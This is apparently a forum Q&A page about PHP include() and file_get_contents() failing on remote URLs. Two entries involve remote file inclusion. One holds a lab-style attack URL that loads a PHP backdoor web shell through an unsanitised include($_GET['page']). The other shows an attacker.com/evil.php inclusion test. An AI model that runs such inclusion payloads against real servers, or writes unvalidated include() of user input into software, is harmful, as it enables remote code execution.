Hi,
I have this code:
ob_start();
include( "https://example.net/news.php" );
$data = ob_get_contents();
ob_end_clean();
problem is that sometimes the request seems to fail for some reason (despite the requested file and the file that makes the request are on the same server) and then the page wont finish loading which is putting a lot of load on the server. This is the error I get:
PHP Warning: include(): Failed opening 'https://example.net/news.php' for inclusion
So I was thinking to condition the include only if the request succeeds so I wont have this problem. How can I do that?
Thank you.
Related
I'm trying to write the content of a page on my server to a variable using file_get_contents:
$lnk = "https://www.example.com/test%20file.php";
$otpt = file_get_contents($lnk);
The full URL is needed because I need the PHP output of the page and not the PHP script itself.
When running the above code I get this warning: failed to open stream: HTTP request failed! No other information, e. g. HTML error code, is provided. allow_url_fopen is enabled on the server. error_reporting(E_ALL) doesn't show any more information. The only thing which seems mentionable to me is that the file_get_contents request takes much too long (up to 30 secs) for the ~57 KB file I'm currently testing on.
I checked the Reference - What does this error mean in PHP?, but to no avail. I really have no idea what this message means since any further specification by PHP is missing. Any help would be very much appreciated.
Thanks in advance!
When i am trying to backdoor a web page given to me to find a specific file, upon requesting a shell i am given the following warnings on the page, and no other information is given. Should a shell pop up? I am kind of new to RFI and this is my first time working through it.
The link i used is:
http://10.102.x.x/description.php?page=http://10.102.x.xx//usr/share/webshells/php/php-backdoor.php
The display when searching it was:
Warning: include(http://10.102.x.xx//usr/share/webshells/php/php-backdoor.php): failed to open stream: Connection refused in /var/www/html/description.php on line 5
Warning: include(): Failed opening 'http://10.102.x.xx//usr/share/webshells/php/php-backdoor.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/description.php on line 5
description.php looks like this:
<?php
$image_name = $_GET['page'];
// Get the description from another file
include($image_name);
?>
What is the issue? I am sort of stuck.
Should i create a HTTP server to push my shell instead? I've read something about this but not sure what that entails
Even a link to an article is appreciated
I don't know how the php script looks like where you try go include the remote page, but it has to be something like:
$incfile = $_REQUEST["file"]; include($incfile.".php");
I am trying to upgrade my php from v.5 to v.7.2, and I have encountered this bug I couldn't fix.
I have a tpl file with external header & footer included but they wont load anymore.
This is the error( * please note: spaces added on purpose * ) :
Warning: include(): Failed opening 'https: //mywebsite.com/folder1/includes/wrappers/footer.html' for inclusion (include_path='.;C:\php\pear') in * folderpath*\bottom_page.html on line 86
At the main tpl file (lets call it "home.tpl") I have this line for the footer:
<?php include dirname( __ FILE__)."\bottom_page.html" ; ?>
At bottom_page.html I have some scripts which seems to be fine and at the end, this line:
<?php include('https: //mywebsite.com/folder1/includes/wrappers/footer.html'); ?>
this line seems to be the problem, I searched a lot and did not find a solution
This is what I have tried:
verify allow_url_fopen & allow_url_include in php.ini is 1
using readfile or file_get_contents instead of include
Any more suggestions? :)
p.s: the url is correct, the browser shows the content I wanted to include..
Ok so I have found a solution- finally:
php include to external url
the comment from Nicholas Valbusa, the curl usage works :)
I have an issue. I was testing how remote file inclusion injection and tried to include the file from URL query string using PHP. But here I am getting some warning messages. I am explaining my code below.
<?php
$file = $_GET['file'];
include($file);
?>
I am getting the following messages.
Warning: include(): http:// wrapper is disabled in the server configuration by allow_url_include=0 in /opt/lampp/htdocs/test/remote.php on line 3
Warning: include(http://attacker.com/evil.php): failed to open stream: no suitable wrapper could be found in /opt/lampp/htdocs/test/remote.php on line 3
Warning: include(): Failed opening 'http://attacker.com/evil.php' for inclusion (include_path='.:/opt/lampp/lib/php') in /opt/lampp/htdocs/test/remote.php on line 3
Here I am calling remote file like this http://localhost/test/remote.php?file=http://kooleedback.com/about.php. Here I need to know how it can be successfully included and also how it can be prevented.
Your server has the allow_url_include option disabled. This means you can only access local files with include(), not external URLs.
In general it doesn't make sense to use include() with a remote .php URL. When you request a .php file from a server, it doesn't return the source code, it executes the script and returns the output. But include() needs to get PHP code, which it executes as if it were in the including script.
If you want to get that remote data you should use file_get_contents($file), not include($file).
I am working on a script that fetches csv files from a web server. I am using file_get_contents presently. Sometimes i get the message
Warning: file_get_contents failed to open stream: Connection timed out
I assume it can be due to website being down. Or can there be a situation where the website is fine but still this warning shows up. Also what advantage does CURL provide over this function.
this is because the remote url is having 404 error.
For accessing remote files, you should use cURL. You can set cURL to timeout quietly if the remote server takes too long.